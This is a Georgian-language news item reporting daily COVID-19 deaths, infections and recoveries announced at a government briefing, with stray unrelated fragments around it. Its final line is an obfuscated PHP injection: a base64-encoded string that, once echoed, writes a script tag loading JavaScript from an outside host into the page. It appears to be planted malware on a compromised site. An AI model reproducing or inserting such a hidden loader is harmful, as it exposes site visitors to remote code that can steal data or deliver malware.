celsiusi
ავერსი შნაიდერი
საქართველოში კორონავირუსისგან კიდევ 42 პაციენტი გარდაიცვალა. ხოლო  ვირუსისგან გამოჯანმრთელდა 3 740 პირი, ჯამში კი გამოჯანმრთელებულთა რაოდენობა გაიზარდა - 188 408-მდე. ამის შესახებ უწყებათაშორის საკოორდინაციო საბჭოსთან არსებული ოპერაციული შტაბის უფროსის მოადგილემ, ბერდია სიჭინავამ, მთავრობის ადმინისტრაციაში გამართულ ბრიფინგზე განაცხადა.
 
მისივე ინფორმაციით, ქვეყანაში სულ კორონავირუსით 2182 ადამიანი გარდაიცვალა. „სამწუხაროდ, ბოლო 24 საათში გვაქვს კორონავირუსით გარდაცვალების 42 ახალი შემთხვევა. პანდემიის გავრცელებიდან დღემდე ვირუსს ჯამში 2 182 პირი ემსხვერპლა“,-განაცხადა სიჭინავამ.
 
ამასთან, ბოლო 24 საათში ქვეყანაში კორონავირუსით 3064 ადამიანი დაინფიცირდა, გამოჯანმრთელდა 3740 პირი.
1693
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");